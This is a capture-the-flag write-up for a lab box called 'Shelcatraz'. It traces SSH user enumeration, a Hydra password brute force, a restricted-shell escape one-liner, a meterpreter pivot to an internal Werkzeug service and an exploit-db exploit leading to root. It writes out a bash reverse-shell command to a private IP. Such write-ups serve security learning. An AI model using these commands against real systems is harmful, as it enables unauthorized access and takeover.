Shelcatraz ========== First I found that ssh was the only port open on the server so I checked the version and found that it was vulnerable to username enumeration. I used the metasploit ssh_enumusers module to find that the user amy was registered as a user. I next used Hydra to brute force the ssh password for amy and discovered the password was cookie. Once I was ssh'd into the box I could cat flag1.txt and get 20 points. I found that the shell was locked down and it wasn't possible to perform many commands. After some searching I found a command on github that would allow me to break out of the shell: echo FREEDOM! && cd () bash && cd I was then able to cat flag2.txt and read the flag and gain 20 points. I next performed a netstat -antp and found that there was an unfamiliar service available on the server at port 7777 behind the firewall. I wasn't able to disable the firewall so I uploaded a meterpreter payload to the server and set up a proxy forwarder from 8071 to 7777. I was then able to discover the service on the port was Werkzung. I checked metasploit for Werkzung and found an exploit ready to go for this version. I ran it and it wouldn't work. On further investigation it looked like the password hash on the werkzung server had been tampered with and it didn't match the exploit. I found another exploit on exploitdb: https://www.exploit-db.com/exploits/43905 I was able to modify this exploit to read in the hash but it still wouldn't work. After examining the hash it seemed that it had been base64 encoded. I decoded it and used the decoded hash in the 43905 exploit and was able to gain remote code execution. I set up a listener and passed the following as RCE: /bin/bash -i >& /dev/tcp/192.168.195.1/8080 0>&1 I next received a shell as root on the server and could cat flag3.txt for 50 points.